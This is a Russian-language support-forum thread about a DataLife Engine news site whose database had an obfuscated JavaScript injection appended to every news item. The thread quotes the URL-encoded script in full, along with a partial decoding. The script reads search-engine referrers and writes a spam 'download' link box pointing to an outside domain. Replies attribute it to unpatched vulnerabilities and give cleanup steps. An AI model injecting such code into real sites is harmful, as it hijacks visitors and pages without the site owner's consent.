Вставили скрипт в полную новость

[udm2007 1]

Привет. freshsound.org

случайно увидел, с 19 января около начал автоматом добавляться скрипт в конце полной новости добавили скрипт. что он означает? что делает? как избавиться, если он автоматом добавляется?

<script type="text/javascript">document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%0A%0Afunction%20getrandom%28min_random%2C%20max_random%29%20%7B%0A%20%20%20%20var%20range%20%3D%20max_random%20-%20min_random%20+%201%3B%0A%20%20%20%20return%20Math.floor%28Math.random%28%29*range%29%20+%20min_random%3B%0A%7D%0A%0ABCB%20%3D%20%7B%7D%3B%0ABCB.r_tds%20%3D%20false%3B%0ABCB.f_tds%20%3D%20false%3B%0ABCB.a_s%20%3D%20false%3B%0ABCB.ses%20%3D%20%5B%0A%09%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%0A%09%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%0A%5D%3B%0ABCB.BCB%20%3D%20function%28ref%29%20%7B%0A%09var%20q%3Dnull%3B%0A%0A%09for%28var%20i%3D0%3B%20i%3CBCB.ses.length%3B%20i++%29%20%7B%0A%09%09var%20se%20%3D%20BCB.ses%5Bi%5D%3B%0A%09%09if%20%28ref.match%28se%5B0%5D%29%29%20%7B%0A%09%09%09q%20%3D%20ref.match%28se%5B1%5D%29%3B%0A%09%09%09if%20%28q%29%20q%20%3D%20q%5Bse%5B2%5D%5D%3B%0A%09%09%09break%3B%0A%09%09%7D%0A%09%7D%0A%0Avar%20referer%3D%22Y%22%3B%0Aif%20%28referer%3D%3D%22N%22%29%20%7B%0Aq%3Ddocument.title%3B%0A%0A%7D%0A%0A%09if%20%28q%29%20%7B%0A%0A%09%09q%3Ddocument.title%3B%0A%09%09var%20q_array%20%3D%20q.split%28%22%20%BB%22%29%3B%0A%09%09var%20q%20%3D%20q_array%5B0%5D%3B%0A%0A%0Avar%20c_url%3D%27http%3A//rapidasshared.tk/%3Fwkey%3D68905%26query%3D%27+%28encodeURIComponent%28q%29%29%3B%0A%0Adocument.write%28%27%3Cstyle%3E.module-one-search%20img%20%7Bdisplay%3Ablock%3B%7D.module-one-search%20%7Bheight%3A112px%3Bmargin%3A6px%3Bfont%3Abold%2016px%20Arial%3Bbackground%3A%23fefefe%20url%28http%3A//img291.imageshack.us/img291/3307/blbg.gif%29%20repeat-y%20100%25%200%3Bborder%3A1px%20solid%20%23fefefe%3Bborder%3A1px%20solid%20%23ccc%3B%7D.module-one-search%20a%20%7Bcolor%3A%23007ecb%3B%7D.module-one-search%20span%20%7Bdisplay%3Ablock%3Bcolor%3A%23464646%3Bfont%3A12px%20Arial%3Btext-transform%3Auppercase%3B%7D.module-one-search%20.module-bg%20%7Bcolor%3A%23000000%3Bheight%3A72px%3Bpadding%3A40px%20100px%200%20131px%3Bbackground%3Aurl%28http%3A//img19.imageshack.us/img19/9311/blbgl.gif%29%20no-repeat%2014px%2016px%3B%7D%3C/style%3E%3Cdiv%20class%3D%22module-one-search%22%3E%3Cdiv%20class%3D%22module-bg%22%3E%u0421%u043A%u0430%u0447%u0430%u0442%u044C%20%3Ca%20href%3D%22%27+c_url+%27%22%20target%3D%22_blank%22%3E%3Cb%3E%27+q+%27%3C/b%3E%3C/a%3E%20%u043F%u0440%u044F%u043C%u0430%u044F%20%u0441%u0441%u044B%u043B%u043A%u0430%3C/div%3E%3C/div%3E%27%29%3B//e%0A%09%7D%0A%7D%3B%0ABCB.BCB%28document.referrer%29%3B%0A%3C/script%3E"));</script>

[celsoft 6216]

http://forum.dle-news.ru/index.php?showtopic=54208

http://forum.dle-news.ru/index.php?showtopic=54077

[udm2007 1]

понял

[celsoft 6216]

как избавиться, если он автоматом добавляется?

еще непонятно, добавляется сразу после добавления новости? Смотрите файлы шаблонов, также восстановите оригинальные файлы скрипта. В админпанели проверьте антивирусом и удалите все на что он укажет.

[udm2007 1]

вообще, если последний патч только от 14 сентября - то все они стоят. А скрипт не в шаблоне, а вот именно в полной новости в базе. И добавляется автоматически при добавлении новости. в моих новостях он тоже вставился.

и почему нельзя в админке - ПОИСК и ЗАМЕНА удалить автоматом этот код?

[celsoft 6216]

вообще, если последний патч только от 14 сентября - то все они стоят

не только, также http://dle-news.ru/bags/v85/1040-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html и другие которые вышли после выхода установленной у вас версии скрипта.

И добавляется автоматически при добавлении новости. в моих новостях он тоже вставился.

Я не совсем о том спрашивал, я спрашивал что когда он появился, просто появился, или например вы сейчас добавляете новость, а там уже есть? В свеже добавленной только что новости?

и почему нельзя в админке - ПОИСК и ЗАМЕНА удалить автоматом этот код?

Для этого нужно иметь актуальную версию скрипта, там есть такой раздел, как перестроение новостей.

[udm2007 1]

Проверил, добавил новость. - всё нормально, чисто. Но повторюсь, этот код стоит во всех новостях,в самом конце полной новости. ТО есть - так его не видно. Но если в полной новости нажать БЫСТРОЕ РЕДАКТИРОВАНИЕ - откроется редактор и в конце будет этот код. Это во всех новостях начиная с 18 января и в моих в том числе

[celsoft 6216]

udm2007,

Тогда все верно, не установленные патчи безопасности http://dle-news.ru/bags/ Ставьте все патчи, делайте бекап БД, очищайте и восстанавливайте. После чего меняйте все пароли в том числе и на БД, антивирусом в админпанели проверяйте и удаляйте все файлы на которые он укажет.

[udm2007 1]

как вообще увидеть без кодировки, что там за текст в коде?

[WWW.ZEOS.IN 1161]

udm2007, пишите мне в ICQ, почистим Вам и базу и файлы

[udm2007 1]

Спасибо 100 новостей я и сам подправлю. Тут же важна причина, сейчас вот буду искать отрывки этого кода во всём бэкапе

я в шоке. Ищу новости через поиск. Но даже после удаления кода в найденных новостях. Снова показывается всегда 120 новостей. Я так понял это максимум что может показывать поиск. И уже начали показываться за 17 января.

[udm2007 1]

вообщем, по всей базе новостей приписался этот код 24000. Вот и каким образом это можно? Только если напрямую соедениться с базой и скриптом его прописать в каждую новость?

и я ещё повторю, каким образом можно раскодировать этот код, что бы понять куда он ссылался и что он делал?

[zgr 72]

Вот расшифровка. Дальше копать нужно что это, откуда и как могло попасть... Думаю, если погуглить, то наверняка кто-то такой код уже видел и написал решение проблемы

<script type="text/javascript">document.write(unescape("<script type="text/javascript% 22> function getrandom(min_random, max_random) { var range =% 20max_random - min_random 1; return Math.floor(Math.random()*range)% 20 min_random; } BCB = {}; BCB.r_tds = false; BCB.f_tds = false% 3B BCB.a_s = false; BCB.ses = [ [/google\./i, /(\?|&)q=% 28.*?)(&|$)/i, 2], [/search\.yahoo\./i, /(\?|&)p=(. *?)(&|$)/i, 2], [/bing\.com/i, /(\?|&)q=(.*?)(% 26|$)/i, 2], [/search\.aol\./i, /(\?|&)q=(.*?)(&% 7C$)/i, 2], [/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i% 2C 2], [/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2% 5D, [/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2% 5D, [/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2], % 09[/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2], [/% 28nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/ i, 2], [/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2]% 2C [/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2], % 09[/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2] ]; BCB.BCB% 20= function(ref) { var q=null; for(var i=0; i<BCB.ses.length% 3B i ) { var se = BCB.ses; if (ref.match(se[0])% 29 { q = ref.match(se[1]); if (q) q = q[se[2% 5D]; break; } } var referer="Y"; if (referer=% 3D"N") { q=document.title; } if (q) { q=document. title; var q_array = q.split(" »"); var q = q_array[0% 5D; var c_url='http://rapidasshared.tk/?wkey=68905&query=' (encodeURIComponent% 28q)); document.write('<style>.module-one-search img {display:block;}.module- one-search {height:112px;margin:6px;font:bold 16px Arial;background:#fefefe url% 28http://img291.imageshack.us/img291/3307/blbg.gif) repeat-y 100% 0;border:1px solid% 20#fefefe;border:1px solid #ccc;}.module-one-search a {color:#007ecb;}.module- one-search span {display:block;color:#464646;font:12px Arial;text-transform:uppercase% 3B}.module-one-search .module-bg {color:#000000;height:72px;padding:40px 100px 0% 20131px;background:url(http://img19.imageshack.us/img19/9311/blbgl.gif) no-repeat 14px 16px% 3B}</style><div class="module-one-search"><div class="module-bg">С% u043Aачать <a href="' c_url '" target="_blank"><b% 3E' q '</b></a> прямая ссылка% 3C/div></div>');//e } }; BCB.BCB(document.referrer); </script>"));</script>

[udm2007 1]

ну и неужели многоуважаемый celsoft не может сказать, что этот код выполнял?

[celsoft 6216]

Только если напрямую соедениться с базой и скриптом его прописать в каждую новость?

так оно и есть, он вставлен напрямую в БД а не через скрипт. И это у вас во всех новостях, которые были в БД на тот момент. Поэтому нужно делать бекап БД и удалять из бекапа. Можно обновиться на актуальную версию скрипта, в нем есть раздел в админпанели "перестроение публикаций", он автоматически также удалит зловредный код из новостей, т.к. данный код скриптом недопустим при публикации.

ну и неужели многоуважаемый celsoft не может сказать, что этот код выполнял?

вам же уже написали выше, это вставка рекламы.